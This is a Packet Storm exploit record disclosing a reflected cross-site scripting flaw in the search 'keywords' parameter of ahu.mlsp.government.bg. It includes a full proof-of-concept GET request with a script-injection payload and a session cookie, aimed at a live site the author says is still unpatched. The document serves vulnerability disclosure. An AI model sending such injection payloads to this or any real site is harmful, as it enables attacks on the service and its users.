📄 ahu.mlsp.government.bg Cross Site Scripting_PACKETSTORM:214049

{
    "lastseen": "2026-01-19T17:51:48",
    "description": "ahu.mlsp.government.bg suffers from a cross site scripting issue. The researcher has waited over a year after reporting this to make public, so hopefully this will encourage them to fix it...",
    "published": "2026-01-19T00:00:00",
    "modified": "2026-01-19T00:00:00",
    "type": "packetstorm",
    "title": "\ud83d\udcc4 ahu.mlsp.government.bg Cross Site Scripting",
    "source": "",
    "references": "",
    "id": "PACKETSTORM:214049",
    "bulletinFamily": "exploit",
    "cwe": null,
    "cvelist": [],
    "sourceData": "## Titles: ahu.mlsp.government.bg-XSS-Reflected-CRITICAL Cross-site scripting (reflected)\n    ## Author: nu11secur1ty\n    ## Date: 1/18/2026\n    ## Vendor: ahu.mlsp.government.bg\n    ## Software: ahu.mlsp.government.bg\n    ## Reference: https://portswigger.net/web-security/cross-site-scripting\n    \n    ## Description:\n    The value of the `keywords` request parameter is copied into the HTML\n    document as plain text between tags. The payload\n    fpizv<script>alert(1)</script>b6a49ruc4py was submitted in the keywords\n    parameter. This input was echoed unmodified in the application's response.\n    This proof-of-concept attack demonstrates that it is possible to inject\n    arbitrary JavaScript into the application's response.  The original request\n    used the POST method, however it was possible to convert the request to use\n    the GET method, to enable easier demonstration and delivery of the attack.\n    \n    STATUS: HIGH- Vulnerability\n    \n    [+]PoC:\n    ```\n    GET /search/?keywords=fpizv%3cscript%3ealert(1)%3c%2fscript%3eb6a49ruc4py\n    HTTP/1.1\n    Host: ahu.mlsp.government.bg\n    Cache-Control: max-age=0\n    Sec-CH-UA: \"Chromium\";v=\"143\", \"Not;A=Brand\";v=\"24\", \"Google Chrome\";v=\"143\"\n    Sec-CH-UA-Mobile: ?0\n    Sec-CH-UA-Platform: \"Windows\"\n    Accept-Language: en-US;q=0.9,en;q=0.8\n    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36\n    (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36\n    Accept:\n    text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7\n    Sec-Fetch-Site: none\n    Sec-Fetch-Mode: navigate\n    Sec-Fetch-User: ?1\n    Sec-Fetch-Dest: document\n    Accept-Encoding: gzip, deflate, br\n    Connection: close\n    Cookie: JSESSIONID=B73DAEC7FBA9D531A0EA45F18C6A5B19\n    Origin: null\n    Upgrade-Insecure-Requests: 1\n    \n    ```\n    \n    ## Demo PoC:\n    [href](https://www.patreon.com/posts/ahu-mlsp-bg-xss-148520630)\n    \n    ## Time spent:\n    01:27:00",
    "sourceHref": "https://packetstorm.news/download/214049",
    "cvss": {
        "score": 0,
        "severity": "NONE",
        "vector": "NONE",
        "version": "NONE"
    },
    "cvss2": [],
    "cvss3": {
        "version": "",
        "vectorString": "",
        "baseScore": 0,
        "baseSeverity": "",
        "attackVector": "",
        "attackComplexity": "",
        "privilegesRequired": "",
        "userInteraction": "",
        "scope": "",
        "confidentialityImpact": "",
        "integrityImpact": "",
        "availabilityImpact": "",
        "cvssV3": {
            "version": "",
            "vectorString": "",
            "baseScore": 0,
            "baseSeverity": "",
            "attackVector": "",
            "attackComplexity": "",
            "privilegesRequired": "",
            "userInteraction": "",
            "scope": "",
            "confidentialityImpact": "",
            "integrityImpact": "",
            "availabilityImpact": ""
        }
    },
    "href": "https://packetstorm.news/files/id/214049/",
    "category_name": "Exploit",
    "post_link": "",
    "product": "",
    "version": "",
    "vendor": "",
    "ai_description": "",
    "ai_severity": "",
    "ai_vendor": "",
    "ai_product": "",
    "ai_version": "",
    "ai_score": 0
}